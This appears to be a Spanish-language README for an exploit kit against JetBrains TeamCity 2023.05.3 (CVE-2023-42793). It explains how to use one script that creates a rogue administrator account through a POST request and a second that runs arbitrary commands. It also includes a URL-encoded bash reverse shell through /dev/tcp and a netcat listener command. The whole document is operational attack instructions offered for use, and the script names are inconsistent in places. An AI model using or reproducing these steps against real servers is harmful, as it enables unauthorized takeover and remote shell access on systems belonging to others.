
JetBrains TeamCity 2023.05.3 - Ejecución remota de código (RCE), CVE-2023-42793
usa primero
exploit.pypara crear una cuenta de administrador y luego usarce.pypara ejecutar comandos en el objetivo, y para reverse shell consulta esto
Este script explota CVE-2023-42793 para crear una cuenta de administrador en un servidor TeamCity. Envía una solicitud POST a la URL objetivo para crear un usuario administrador con credenciales especificadas o aleatorias.
python exploit.py -u <URL> [-v] [-n <USUARIO>] [-p <CONTRASEÑA>] [-e <EMAIL>]
-u, --url URL: URL objetivo (requerido)-v, --verbose: Activar modo verbose-n, --username USUARIO: Especificar nombre de usuario (por defecto: aleatorio)-p, --password CONTRASEÑA: Especificar contraseña (por defecto: aleatorio)-e, --email EMAIL: Especificar email (por defecto: aleatorio)-t, --token-file: Archivo para guardar el tokenpip3 install -r requirements.txtExplotar con nombre de usuario, contraseña y email aleatorios:
python exploit.py -u http://target.com
Explotar con nombre de usuario, contraseña y email especificados:
python exploit.py -u http://target.com -n admin -p admin123 -e [email protected]
Tras una explotación exitosa, el script imprime la URL, el nombre de usuario y la contraseña de la cuenta de administrador creada, y luego guarda la salida en el archivo de token.
Este script permite ejecutar comandos en un servidor TeamCity vulnerable explotando CVE-2023-42793. Primero habilita los procesos de depuración y luego ejecuta el comando especificado usando los endpoints API apropiados.
python rce_exploit.py -u <URL> [-v] [-c <COMANDO>] [-P <PUERTO>]
-u, --url URL : URL objetivo (requerido)-t, --token-file : Para especificar el archivo que contiene el token-c, --command COMANDO: Especificar comando a ejecutar (RCE)-P, --port PUERTO: Especificar puerto (por defecto es 80)Explotar con un comando especificado:
python rce.py -u http://target.com -t token -c "whoami"
python3 rce.py -u http://target.com -t token -c '"/bin/bash"¶ms="-c"¶ms="sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{port}%200%3E%261"'
nc -nvlp 5555